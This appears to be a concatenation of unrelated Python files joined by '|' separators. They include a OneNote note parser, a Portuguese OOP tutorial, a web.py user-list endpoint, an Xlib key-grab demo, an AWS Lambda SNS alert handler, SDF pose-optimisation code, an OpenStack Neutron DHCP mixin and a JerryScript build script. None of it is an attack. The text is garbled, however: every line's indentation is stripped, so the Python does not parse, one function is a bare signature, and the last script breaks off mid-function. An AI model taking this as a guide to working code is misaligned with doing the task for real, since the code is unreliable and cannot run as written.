from synctogit.service.notes.stored_note import CorruptedNoteError, StoredNote
from .models import OneNotePage, OneNotePageId, OneNotePageMetadata
class OneNoteStoredNote(StoredNote):
@classmethod
def note_to_html(cls, note: OneNotePage, timezone: pytz.BaseTzInfo) -> bytes:
note_header = OrderedDict() # type: Mapping[str, str]
for k in ["id", "title", "created", "last_modified"]:
v = getattr(note.info, k)
if k in ["created", "last_modified"]:
v = str(v.astimezone(timezone))
v = str(v)
note_header[k] = v
return super()._note_to_html(note_header=note_header, note_html=note.html)
@classmethod
def get_stored_note_metadata(
cls, notes_dir, note_path: Path
) -> Tuple[OneNotePageId, OneNotePageMetadata]:
dir_parts = note_path.relative_to(notes_dir).parents[0].parts
if 2 != len(dir_parts):
raise CorruptedNoteError(
"Note's dir depth is expected to be exactly 2 levels", note_path
)
file = note_path.name
header_vars = cls._parse_note_header(note_path)
try:
name = (
# fmt: off
tuple(denormalize_filename(d) for d in dir_parts)
+ (header_vars["title"],)
# fmt: on
)
note_metadata = OneNotePageMetadata(
dir=dir_parts,
name=name,
last_modified=cls._parse_datetime(header_vars["last_modified"]),
file=file,
)
return header_vars["id"], note_metadata
except (KeyError, ValueError) as e:
raise CorruptedNoteError(
"Unable to retrieve note metadata: %s" % repr(e), note_path
)
@classmethod
def _parse_datetime(cls, dt: str) -> datetime.datetime:
parsed_dt = dateutil.parser.parse(dt)
if not parsed_dt.tzinfo:
raise ValueError("Expected tz-aware datetime, received '%s'" % dt)
return parsed_dt
|
"""
Outras linguagens de programação:
Public, Private, Protected
-Public: Consegue acessar o atributo ou método dentro ou fora da classe
+Private: Consegue acessar o atributo ou método apenas dentro da classe
#Protected: Consegue acessar o atributo ou método apenas dentro da classe ou dentro das classes filhas da classe
No python, esses conceitos não existem exatamente desta maneira
O que existe mais são convenções onde os programadores entendem que podem ou não usar algo
_NOMEATRIBUTO Simboliza que o atributo ou método não deve ser acessado ou modificado fora da classe
___NOMEATRIBUTO Simboliza FORTEMENTE que o atributo ou método não deve ser acessado ou modificado fora da classe
Neste ultimo caso, o simbolismo é tamanho que para conseguir se acessar tal atributo ou método, é necessário usar: instancia._NOMECLASSE__nomeatributo/metodo
Ex: p1._Pessoa__nome
"""
class Carro:
def __init__(self):
self.lista_carros = {}
def inserir_carro(self, id, nome):
if 'carros' in self.lista_carros:
self.lista_carros['carros'].update({id:nome})
else:
self.lista_carros['carros'] = {id:nome}
def remover_carro(self, id):
del self.lista_carros['carros'][id]
def mostrar_carros(self):
for id, nome in self.lista_carros['carros'].items():
print(id, nome)
# As coisas funcionam, porém algo perigoso pode ocorrer (segue para o próximo exemplo)
c1 = Carro()
c1.inserir_carro(1, 'Corsa')
c1.inserir_carro(2, 'Mustang')
c1.inserir_carro(3, 'Camaro')
c1.remover_carro(1)
c1.mostrar_carros()
|
from vip_provider.credentials.base import CredentialBase, CredentialAdd
class CredentialNetworkAPI(CredentialBase):
pass
class CredentialAddNetworkAPI(CredentialAdd):
def valid_fields(self):
return [
'user', 'password', 'endpoint', 'business', 'cache_group',
'destination', 'env_pool_id', 'env_vip_id', 'finality',
'healthcheck_expect', 'healthcheck_request', 'healthcheck_type',
'id_equipment_type', 'id_group', 'id_model', 'l4_protocol',
'l7_protocol', 'l7_rule', 'lb_method', 'limit', 'member_status',
'persistence', 'priority', 'servicedownaction', 'timeout',
'traffic_return', 'vm_name', 'weight'
]
|
import web
import sqlite3
import jsonpickle
urls = ('/users', 'users')
class users:
def GET(self):
connection = sqlite3.connect('DOSDATA.sqlite')
sqlite3.connect("DOSDATA.sqlite", check_same_thread=False)
cursor = connection.cursor()
sql_query = "SELECT * FROM dosuser"
rows = cursor.execute(sql_query)
jsonobjectRows = []
for row in rows:
jsonobject = {
'name' : row[0],
'Title' : row[1],
'Email' : row[2],
'Phone' : row[3],
'Location' : row[4],
'Topic' : row[5],
}
jsonobjectRows.append(jsonobject)
connection.close()
return jsonpickle.encode(jsonobjectRows)
app = web.application(urls, globals())
if __name__ == '__main__':
web.httpserver.runsimple(app.wsgifunc(), ("0.0.0.0", 7744))
app.run()
|
from os import urandom, environ
S3_BUCKET_NAME = "wedding-app-images"
S3_ACCESS_KEY_ID = environ.get('S3_ACCESS_KEY_ID')
S3_ACCESS_SECRET_KEY = environ.get('S3_ACCESS_SECRET_KEY')
S3_LOCATION = 'https://{}.s3-sa-east-1.amazonaws.com/'.format(S3_BUCKET_NAME)
SECRET_KEY = urandom(32)
DEBUG = True
API_ADDRESS = "https://enigmatic-mountain-68956.herokuapp.com"
PORT = 5000
|
# coding=utf-8
import signal
from Xlib.display import Display
from Xlib import X
display = Display()
root = display.screen().root
counter = 0
def swallow_keystroke(event):
print("s")
display.allow_events(X.AsyncKeyboard, event.time)
def passthru_keystroke(event):
print("p")
display.allow_events(X.ReplayKeyboard, event.time)
display.flush()
root.grab_key(15, 0, True, X.GrabModeSync, X.GrabModeSync)
root.grab_key(10, 0, True, X.GrabModeSync, X.GrabModeSync)
signal.alarm(10)
while True:
print("event...")
event = display.next_event()
print(event.type, event.detail, event.time)
if event.type == X.KeyPress and event.detail == 10:
print("pressed")
if not counter % 2:
swallow_keystroke(event)
else:
passthru_keystroke(event)
elif event.type == X.KeyRelease and event.detail == 10:
print("released")
if not counter % 2:
swallow_keystroke(event)
else:
passthru_keystroke(event)
counter += 1
if event.type == X.KeyPress and event.detail == 15:
swallow_keystroke(event)
if event.type == X.KeyRelease and event.detail == 15:
print("exit")
break
root.ungrab_key(10, 0)
root.ungrab_key(15, 0)
display.close()
|
import boto3
import botocore
import json
import logging
import os
from botocore.exceptions import ClientError
region = os.environ["AWS_REGION"]
events_channel = os.environ["EVENTS_CHANNEL"].split(",")
logger = logging.getLogger()
#logger.setLevel(logging.INFO)
ssm = boto3.client("ssm", region_name=region)
slack_events_param = ssm.get_parameter(
Name=f'/account/{region}/alert/sns/arn_slack_events',
WithDecryption=False
)
slack_other_events_param = ssm.get_parameter(
Name=f'/account/{region}/alert/sns/arn_slack_otherevents',
WithDecryption=False
)
slack_events_topic = slack_events_param["Parameter"]["Value"]
slack_other_events_topic = slack_other_events_param["Parameter"]["Value"]
def get_sns_client():
sns = boto3.client("sns", region_name=region)
return sns
def send_sns_message(sns_topic_arn, sns_message):
sns = get_sns_client()
try:
response = sns.publish(
TargetArn=sns_topic_arn,
Message=sns_message)
except botocore.exceptions.ClientError as error:
logger.exception(error)
def get_message(record):
message_json = record["Sns"]["Message"]
message = json.loads(message_json)
return message
def get_subject(record):
subject = record["Sns"]["Subject"]
return subject
def parse_record(record):
message = get_message(record)
details = message["Details"]
parsed_message = {}
parsed_message["cause"] = message["Cause"]
parsed_message["asg_name"] = message["AutoScalingGroupName"]
asg_name_parts = parsed_message["asg_name"].split("-")
parsed_message["environment"] = asg_name_parts[0]
alarm = details["InvokingAlarms"][0]
parsed_message["alarm_name"] = alarm["AlarmName"]
trigger = details["InvokingAlarms"][0]["Trigger"]
parsed_message["metric_name"] = trigger["MetricName"]
return parsed_message
def get_sns_topic(environment):
if environment in events_channel:
sns_topic_arn = slack_events_topic
else:
sns_topic_arn = slack_other_events_topic
return sns_topic_arn
def lambda_handler(event, context):
for index, record in enumerate(event["Records"]):
logger.info(json.dumps(record))
subject = get_subject(record)
message_details = parse_record(record)
if message_details["metric_name"] == "CPUUtilization":
console_url = f'https://{region}.console.aws.amazon.com/ec2autoscaling/home?region={region}#/details/{message_details["asg_name"]}?view=activity'
alarm_url = f'https://{region}.console.aws.amazon.com/cloudwatch/home?region={region}#alarmsV2:alarm/{message_details["alarm_name"]}'
sns_message = f'*Subject: {subject}*\n*Message:* {message_details["cause"]}\n*ASG Console url:* {console_url}\n*CW Alarm url:* {alarm_url}\n*EOM*'
sns_topic_arn = get_sns_topic(message_details["environment"])
response = send_sns_message(
sns_topic_arn = sns_topic_arn,
sns_message = sns_message)
logger.info(f"Processed record {index} succesfully")
logger.info(json.dumps(response))
else:
log_message = f'Launch event was not for CPUUtilization. Record:{json.dumps(record)}'
logger.warning(log_message)
return {
"status": "Complete"
} |
# Copyright (c) 2020 NVIDIA Corporation. All rights reserved.
# This work is licensed under the NVIDIA Source Code License - Non-commercial. Full
# text can be found in LICENSE.md
from sdf_optimizer import *
from transforms3d.quaternions import mat2quat, quat2mat
import cv2
def Twc_np(pose):
Twc = np.zeros((4, 4), dtype=np.float32)
Twc[:3, :3] = quat2mat(pose[3:])
Twc[:3, 3] = pose[:3]
Twc[3, 3] = 1
return Twc
try:
import cPickle as pickle
except:
import pickle
import numpy as np
from itertools import izip_longest as izip
class SignedDensityField(object):
""" Data is stored in the following way
data[x, y, z]
"""
def __init__(self, data, origin, delta):
self.data = data
self.nx, self.ny, self.nz = data.shape
self.origin = origin
self.delta = delta
self.max_coords = self.origin + delta * np.array(data.shape)
def _rel_pos_to_idxes(self, rel_pos):
i_min = np.array([0, 0, 0], dtype=np.int)
i_max = np.array([self.nx - 1, self.ny - 1, self.nz - 1], dtype=np.int)
return np.clip(((rel_pos - self.origin) / self.delta).astype(int), i_min, i_max)
def get_distance(self, rel_pos):
idxes = self._rel_pos_to_idxes(rel_pos)
assert idxes.shape[0] == rel_pos.shape[0]
return self.data[idxes[:, 0], idxes[:, 1], idxes[:, 2]]
def dump(self, pkl_file):
data = {}
data['data'] = self.data
data['origin'] = self.origin
data['delta'] = self.delta
pickle.dump(data, open(pkl_file, "wb"), protocol=2)
def visualize(self, max_dist=0.1):
try:
from mayavi import mlab
except:
print("mayavi is not installed!")
figure = mlab.figure('Signed Density Field')
SCALE = 100 # The dimensions will be expressed in cm for better visualization.
data = np.copy(self.data)
data = np.minimum(max_dist, data)
xmin, ymin, zmin = SCALE * self.origin
xmax, ymax, zmax = SCALE * self.max_coords
delta = SCALE * self.delta
xi, yi, zi = np.mgrid[xmin:xmax:delta, ymin:ymax:delta, zmin:zmax:delta]
data[data <= 0] -= 0.2
data = -data
grid = mlab.pipeline.scalar_field(xi, yi, zi, data)
vmin = np.min(data)
vmax = np.max(data)
mlab.pipeline.volume(grid, vmin=vmin, vmax=(vmax + vmin) / 2)
mlab.axes()
mlab.show()
@classmethod
def from_sdf(cls, sdf_file):
with open(sdf_file, "r") as file:
axis = 2
lines = file.readlines()
nx, ny, nz = map(int, lines[0].split(' '))
print(nx, ny, nz)
x0, y0, z0 = map(float, lines[1].split(' '))
print(x0, y0, z0)
delta = float(lines[2].strip())
print(delta)
data = np.zeros([nx, ny, nz])
for i, line in enumerate(lines[3:]):
idx = i % nx
idy = int(i / nx) % ny
idz = int(i / (nx * ny))
val = float(line.strip())
data[idx, idy, idz] = val
return cls(data, np.array([x0, y0, z0]), delta)
@classmethod
def from_pkl(cls, pkl_file):
data = pickle.load(open(pkl_file, "r"))
return cls(data['data'], data['origin'], data['delta'])
if __name__ == '__main__':
# object_name = '002_master_chef_can'
# object_name = '037_scissors'
# object_name = '061_foam_brick'
object_name = '007_tuna_fish_can'
visualize_sdf = False
sdf_file = '../../data/YCB_Object/models/{}/textured_simple_low_res.pth'.format(object_name)
sdf_optim = sdf_optimizer(sdf_file, lr=0.01, use_gpu=True, optimizer='Adam')
print(torch.max(sdf_optim.sdf_torch))
print(torch.min(sdf_optim.sdf_torch))
if visualize_sdf:
sdf_show = SignedDensityField.from_sdf(sdf_file)
sdf_show.visualize()
# load points of the same object
point_file = '../../data/YCB_Object/models/{}/points.xyz'.format(object_name)
points = torch.from_numpy(np.loadtxt(point_file)).float()
points = torch.cat((points, torch.ones((points.size(0), 1), dtype=torch.float32)), dim=1)
points_np = points.numpy()
print(points_np.shape)
# set ground truth pose
pose_gt = np.zeros((7,), dtype=np.float32)
pose_gt[:3] = np.array([1, 1, 1], dtype=np.float32)
R = np.array([[-1, 0, 0],
[0, np.sqrt(0.5), -np.sqrt(0.5)],
[0, -np.sqrt(0.5), -np.sqrt(0.5)]], dtype=np.float32)
pose_gt[3:] = mat2quat(R)
# get measurements
Twc_gt = Twc_np(pose_gt)
points_c = np.matmul(np.linalg.inv(Twc_gt), np.transpose(points_np)).transpose()
points_c = torch.from_numpy(points_c)
index = np.random.permutation(np.arange(points_c.shape[0]))[:2000]
points_c = points_c[index, :]
print(points_c.shape)
T_co_init = np.linalg.inv(Twc_gt)
R_perturb = axangle2mat(np.random.rand(3,), 40 * np.random.rand() / 57.3, is_normalized=False)
T_co_init[:3, :3] = np.matmul(T_co_init[:3, :3], R_perturb)
T_co_init[:3, 3] += 0.01
points_init = np.matmul(np.linalg.inv(T_co_init), points_c.numpy().transpose()).transpose()
# optimization
points_input = points_c[:, :3].clone().cuda()
T_co_opt, sdf_values = sdf_optim.refine_pose_layer(T_co_init, points_input, steps=100)
print(T_co_opt)
print(np.linalg.inv(Twc_gt))
np.set_printoptions(threshold=sys.maxsize)
# print(sdf_values.detach().cpu().numpy())
# visualization for debugging
points_opt = np.matmul(np.linalg.inv(T_co_opt), points_c.numpy().transpose()).transpose()
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(points_np[::5, 0], points_np[::5, 1], points_np[::5, 2], color='green')
ax.scatter(points_init[::5, 0], points_init[::5, 1], points_init[::5, 2], color='red')
ax.scatter(points_opt[::5, 0], points_opt[::5, 1], points_opt[::5, 2], color='blue')
ax.set_xlabel('X Label')
ax.set_ylabel('Y Label')
ax.set_zlabel('Z Label')
min_coor = np.min(np.array([sdf_optim.xmin, sdf_optim.ymin, sdf_optim.zmin]))
max_coor = np.max(np.array([sdf_optim.xmax, sdf_optim.ymax, sdf_optim.zmax]))
ax.set_xlim(min_coor, max_coor)
ax.set_ylim(min_coor, max_coor)
ax.set_zlim(min_coor, max_coor)
plt.show()
|
def target_game(values):
|
# Copyright (c) 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import extra_dhcp_opt as edo_ext
from neutron_lib.api.definitions import port as port_def
from neutron.db import _resource_extend as resource_extend
from neutron.db import api as db_api
from neutron.objects.port.extensions import extra_dhcp_opt as obj_extra_dhcp
@resource_extend.has_resource_extenders
class ExtraDhcpOptMixin(object):
"""Mixin class to add extra options to the DHCP opts file
and associate them to a port.
"""
def _is_valid_opt_value(self, opt_name, opt_value):
# If the dhcp opt is blank-able, it shouldn't be saved to the DB in
# case that the value is None
if opt_name in edo_ext.VALID_BLANK_EXTRA_DHCP_OPTS:
return opt_value is not None
# Otherwise, it shouldn't be saved to the DB in case that the value
# is None or empty
return bool(opt_value)
def _process_port_create_extra_dhcp_opts(self, context, port,
extra_dhcp_opts):
if not extra_dhcp_opts:
return port
with db_api.context_manager.writer.using(context):
for dopt in extra_dhcp_opts:
if self._is_valid_opt_value(dopt['opt_name'],
dopt['opt_value']):
ip_version = dopt.get('ip_version', 4)
extra_dhcp_obj = obj_extra_dhcp.ExtraDhcpOpt(
context,
port_id=port['id'],
opt_name=dopt['opt_name'],
opt_value=dopt['opt_value'],
ip_version=ip_version)
extra_dhcp_obj.create()
return self._extend_port_extra_dhcp_opts_dict(context, port)
def _extend_port_extra_dhcp_opts_dict(self, context, port):
port[edo_ext.EXTRADHCPOPTS] = self._get_port_extra_dhcp_opts_binding(
context, port['id'])
def _get_port_extra_dhcp_opts_binding(self, context, port_id):
opts = obj_extra_dhcp.ExtraDhcpOpt.get_objects(
context, port_id=port_id)
# TODO(mhickey): When port serilization is available then
# the object list should be returned instead
return [{'opt_name': r.opt_name, 'opt_value': r.opt_value,
'ip_version': r.ip_version}
for r in opts]
def _update_extra_dhcp_opts_on_port(self, context, id, port,
updated_port=None):
# It is not necessary to update in a transaction, because
# its called from within one from ovs_neutron_plugin.
dopts = port['port'].get(edo_ext.EXTRADHCPOPTS)
if dopts:
opts = obj_extra_dhcp.ExtraDhcpOpt.get_objects(
context, port_id=id)
# if there are currently no dhcp_options associated to
# this port, Then just insert the new ones and be done.
with db_api.context_manager.writer.using(context):
for upd_rec in dopts:
for opt in opts:
if (opt['opt_name'] == upd_rec['opt_name']
and opt['ip_version'] == upd_rec.get(
'ip_version', 4)):
# to handle deleting of a opt from the port.
if upd_rec['opt_value'] is None:
opt.delete()
else:
if (self._is_valid_opt_value(
opt['opt_name'],
upd_rec['opt_value']) and
opt['opt_value'] !=
upd_rec['opt_value']):
opt['opt_value'] = upd_rec['opt_value']
opt.update()
break
else:
if self._is_valid_opt_value(
upd_rec['opt_name'],
upd_rec['opt_value']):
ip_version = upd_rec.get('ip_version', 4)
extra_dhcp_obj = obj_extra_dhcp.ExtraDhcpOpt(
context,
port_id=id,
opt_name=upd_rec['opt_name'],
opt_value=upd_rec['opt_value'],
ip_version=ip_version)
extra_dhcp_obj.create()
if updated_port:
edolist = self._get_port_extra_dhcp_opts_binding(context, id)
updated_port[edo_ext.EXTRADHCPOPTS] = edolist
return bool(dopts)
@staticmethod
@resource_extend.extends([port_def.COLLECTION_NAME])
def _extend_port_dict_extra_dhcp_opt(res, port):
res[edo_ext.EXTRADHCPOPTS] = [{'opt_name': dho.opt_name,
'opt_value': dho.opt_value,
'ip_version': dho.ip_version}
for dho in port.dhcp_opts]
return res
|
from kubernetes import client
def request(func, *args, catch=False, **kwargs):
if catch:
try:
return True, func(*args, **kwargs)
except client.rest.ApiException as err:
return False, err
else:
return True, func(*args, **kwargs)
|
#!/usr/bin/env python
import json
import os
import shutil
# EXTRACT
################################################################################
EXPORTED_DIRNAME = 'Exported'
EXTRACT_DIRNAME = 'Courses'
FILES_TO_SKIP = ['.DS_Store', 'Thumbs.db', 'ehthumbs.db', 'ehthumbs_vista.db', '.gitkeep']
def extract_courses():
"""
Extract all the `.gz`s from `chefdata/Exported/{course_name}.gz`
to `chefdata/Courses/{course_name}/course`.
Returns course_names = list of course names encountered.
"""
course_names = []
# src
srcdir = os.path.join('chefdata', EXPORTED_DIRNAME)
# dest
extractdir = os.path.join('chefdata', EXTRACT_DIRNAME)
for filename in os.listdir(srcdir):
if filename.endswith('.gz') or filename.endswith('.tar.gz'):
gzpath = os.path.join(srcdir, filename)
if filename.endswith('.tar.gz'):
course_name = filename.replace('.tar.gz', '')
elif filename.endswith('.gz'):
course_name = filename.replace('.gz', '')
else:
print('unexpected filename', filename)
destdir = os.path.join(extractdir, course_name)
if not os.path.exists(os.path.join(destdir)):
print('Untargzipping course', course_name, 'from', gzpath, 'to', destdir)
shutil.unpack_archive(gzpath, destdir, 'gztar')
course_names.append(course_name)
else:
print('skipping non-gz file', filename)
return course_names
def extract():
"""
Call extract_courses to untargz
Exported/{course_name}.tar.gz --> Courses/{course_name}/course
and list of courses in `course_list.json` for later processing.
"""
course_names = extract_courses()
print('\textracting course_names', course_names)
lang = 'ar'
course_list = {
"title": "Edraak Continuing Education".format(lang),
"kind": "edX course listing",
"courses": []
}
for course_name in course_names:
print('\tCourse course_name=', course_name)
course_info = {
"name": course_name,
"path": os.path.join('chefdata', EXTRACT_DIRNAME, course_name),
"lang": lang,
}
course_list['courses'].append(course_info)
containerdir = os.path.join('chefdata', EXTRACT_DIRNAME)
couse_list_path = os.path.join(containerdir, 'course_list.json')
with open(couse_list_path, 'w') as couse_list_file:
json.dump(course_list, couse_list_file, indent=4, ensure_ascii=False)
# CLI
################################################################################
if __name__ == '__main__':
extract()
|
#!/usr/bin/env python
# Copyright JS Foundation and other contributors, http://js.foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
import multiprocessing
import os
import shutil
import subprocess
import sys
import settings
BUILD_DIR = os.path.join(settings.PROJECT_DIR, 'build')
DEFAULT_PROFILE = 'es5.1'
def default_toolchain():
(sysname, _, _, _, machine) = os.uname()
toolchain = os.path.join(settings.PROJECT_DIR,
'cmake',
'toolchain_%s_%s.cmake' % (sysname.lower(), machine.lower()))
return toolchain if os.path.isfile(toolchain) else None
def get_arguments():
devhelp_preparser = argparse.ArgumentParser(add_help=False)
devhelp_preparser.add_argument('--devhelp', action='store_true', default=False,
help='show help with all options '
'(including those, which are useful for developers only)')
devhelp_arguments, args = devhelp_preparser.parse_known_args()
if devhelp_arguments.devhelp:
args.append('--devhelp')
def devhelp(helpstring):
return helpstring if devhelp_arguments.devhelp else argparse.SUPPRESS
parser = argparse.ArgumentParser(parents=[devhelp_preparser])
parser.add_argument('--all-in-one', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help='all-in-one build (%(choices)s; default: %(default)s)')
parser.add_argument('--builddir', metavar='DIR', action='store', default=BUILD_DIR,
help='specify output directory (default: %(default)s)')
parser.add_argument('--clean', action='store_true', default=False, help='clean build')
parser.add_argument('--cmake-param', metavar='OPT', action='append', default=[],
help='add custom argument to CMake')
parser.add_argument('--compile-flag', metavar='OPT', action='append', default=[],
help='add custom compile flag')
parser.add_argument('--cpointer-32bit', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help='enable 32 bit compressed pointers (%(choices)s; default: %(default)s)')
parser.add_argument('--debug', action='store_const', const='Debug', default='MinSizeRel', dest='build_type',
help='debug build')
parser.add_argument('--doctests', action='store_const', const='ON', default='OFF',
help='build doctests')
parser.add_argument('--error-messages', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help='enable error messages (%(choices)s; default: %(default)s)')
parser.add_argument('--external-context', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help='enable external context (%(choices)s; default: %(default)s)')
parser.add_argument('-j', '--jobs', metavar='N', action='store', type=int, default=multiprocessing.cpu_count() + 1,
help='Allowed N build jobs at once (default: %(default)s)')
parser.add_argument('--jerry-cmdline', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
help='build jerry command line tool (%(choices)s; default: %(default)s)')
parser.add_argument('--jerry-cmdline-snapshot', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help='build snapshot command line tool (%(choices)s; default: %(default)s)')
parser.add_argument('--jerry-debugger', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help='enable the jerry debugger (%(choices)s; default: %(default)s)')
parser.add_argument('--jerry-ext', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
help='build jerry-ext (default: %(default)s)')
parser.add_argument('--jerry-libc', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
help='build and use jerry-libc (%(choices)s; default: %(default)s)')
parser.add_argument('--jerry-libm', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
help='build and use jerry-libm (%(choices)s; default: %(default)s)')
parser.add_argument('--jerry-port-default', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
help='build default jerry port implementation (%(choices)s; default: %(default)s)')
parser.add_argument('--js-parser', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
help='enable js-parser (%(choices)s; default: %(default)s)')
parser.add_argument('--link-lib', metavar='OPT', action='append', default=[],
help='add custom library to be linked')
parser.add_argument('--linker-flag', metavar='OPT', action='append', default=[],
help='add custom linker flag')
parser.add_argument('--lto', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
help='enable link-time optimizations (%(choices)s; default: %(default)s)')
parser.add_argument('--mem-heap', metavar='SIZE', action='store', type=int, default=512,
help='size of memory heap, in kilobytes (default: %(default)s)')
parser.add_argument('--profile', metavar='FILE', action='store', default=DEFAULT_PROFILE,
help='specify profile file (default: %(default)s)')
parser.add_argument('--snapshot-exec', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help='enable executing snapshot files (%(choices)s; default: %(default)s)')
parser.add_argument('--snapshot-save', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help='enable saving snapshot files (%(choices)s; default: %(default)s)')
parser.add_argument('--system-allocator', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help='enable system allocator (%(choices)s; default: %(default)s)')
parser.add_argument('--static-link', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
help='enable static linking of binaries (%(choices)s; default: %(default)s)')
parser.add_argument('--strip', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
help='strip release binaries (%(choices)s; default: %(default)s)')
parser.add_argument('--toolchain', metavar='FILE', action='store', default=default_toolchain(),
help='add toolchain file (default: %(default)s)')
parser.add_argument('--unittests', action='store_const', const='ON', default='OFF',
help='build unittests')
parser.add_argument('-v', '--verbose', action='store_const', const='ON', default='OFF',
help='increase verbosity')
parser.add_argument('--vm-exec-stop', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help='enable VM execution stopping (%(choices)s; default: %(default)s)')
devgroup = parser.add_argument_group('developer options')
devgroup.add_argument('--jerry-cmdline-test', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help=devhelp('build test version of the jerry command line tool '
'(%(choices)s; default: %(default)s)'))
devgroup.add_argument('--link-map', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help=devhelp('enable the generation of a link map file for jerry command line tool '
'(%(choices)s; default: %(default)s)'))
devgroup.add_argument('--mem-stats', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help=devhelp('enable memory statistics (%(choices)s; default: %(default)s)'))
devgroup.add_argument('--mem-stress-test', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help=devhelp('enable mem-stress test (%(choices)s; default: %(default)s)'))
devgroup.add_argument('--regexp-strict-mode', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help=devhelp('enable regexp strict mode (%(choices)s; default: %(default)s)'))
devgroup.add_argument('--show-opcodes', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help=devhelp('enable parser byte-code dumps (%(choices)s; default: %(default)s)'))
devgroup.add_argument('--show-regexp-opcodes', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help=devhelp('enable regexp byte-code dumps (%(choices)s; default: %(default)s)'))
devgroup.add_argument('--valgrind', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help=devhelp('enable Valgrind support (%(choices)s; default: %(default)s)'))
devgroup.add_argument('--valgrind-freya', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
help=devhelp('enable Valgrind-Freya support (%(choices)s; default: %(default)s)'))
arguments = parser.parse_args(args)
if arguments.devhelp:
parser.print_help()
sys.exit(0)
return arguments
def generate_build_options(arguments):
build_options = []
build_options.append('-DENABLE_ALL_IN_ONE=%s' % arguments.all_in_one)
build_options.append('-DCMAKE_BUILD_TYPE=%s' % arguments.build_type)
build_options.append('-DEXTERNAL_COMPILE_FLAGS=' + ' '.join(arguments.compile_flag))
build_options.append('-DFEATURE_CPOINTER_32_BIT=%s' % arguments.cpointer_32bit)
build_options.append('-DFEATURE_ERROR_MESSAGES=%s' % arguments.error_messages)
build_options.append('-DJERRY_CMDLINE=%s' % arguments.jerry_cmdline)
build_options.append('-DJERRY_CMDLINE_TEST=%s' % arguments.jerry_cmdline_test)
build_options.append('-DJERRY_CMDLINE_SNAPSHOT=%s' % arguments.jerry_cmdline_snapshot)
build_options.append('-DJERRY_PORT_DEFAULT=%s' % arguments.jerry_port_default)
build_options.append('-DJERRY_EXT=%s' % arguments.jerry_ext)
build_options.append('-DJERRY_LIBC=%s' % arguments.jerry_libc)
build_options.append('-DJERRY_LIBM=%s' % arguments.jerry_libm)
build_options.append('-DFEATURE_JS_PARSER=%s' % arguments.js_parser)
build_options.append('-DEXTERNAL_LINK_LIBS=' + ' '.join(arguments.link_lib))
build_options.append('-DEXTERNAL_LINKER_FLAGS=' + ' '.join(arguments.linker_flag))
build_options.append('-DENABLE_LTO=%s' % arguments.lto)
build_options.append('-DMEM_HEAP_SIZE_KB=%d' % arguments.mem_heap)
build_options.append('-DFEATURE_PROFILE=%s' % arguments.profile)
build_options.append('-DFEATURE_DEBUGGER=%s' % arguments.jerry_debugger)
build_options.append('-DFEATURE_EXTERNAL_CONTEXT=%s' % arguments.external_context)
build_options.append('-DFEATURE_SNAPSHOT_EXEC=%s' % arguments.snapshot_exec)
build_options.append('-DFEATURE_SNAPSHOT_SAVE=%s' % arguments.snapshot_save)
build_options.append('-DFEATURE_SYSTEM_ALLOCATOR=%s' % arguments.system_allocator)
build_options.append('-DENABLE_STATIC_LINK=%s' % arguments.static_link)
build_options.append('-DENABLE_STRIP=%s' % arguments.strip)
build_options.append('-DFEATURE_VM_EXEC_STOP=%s' % arguments.vm_exec_stop)
if arguments.toolchain:
build_options.append('-DCMAKE_TOOLCHAIN_FILE=%s' % arguments.toolchain)
build_options.append('-DUNITTESTS=%s' % arguments.unittests)
build_options.append('-DDOCTESTS=%s' % arguments.doctests)
build_options.append('-DCMAKE_VERBOSE_MAKEFILE=%s' % arguments.verbose)
# developer options
build_options.append('-DENABLE_LINK_MAP=%s' % arguments.link_map)
build_options.append('-DFEATURE_MEM_STATS=%s' % arguments.mem_stats)
build_options.append('-DFEATURE_MEM_STRESS_TEST=%s' % arguments.mem_stress_test)
build_options.append('-DFEATURE_PARSER_DUMP=%s' % arguments.show_opcodes)
build_options.append('-DFEATURE_REGEXP_STRICT_MODE=%s' % arguments.regexp_strict_mode)
build_options.append('-DFEATURE_REGEXP_DUMP=%s' % arguments.show_regexp_opcodes)
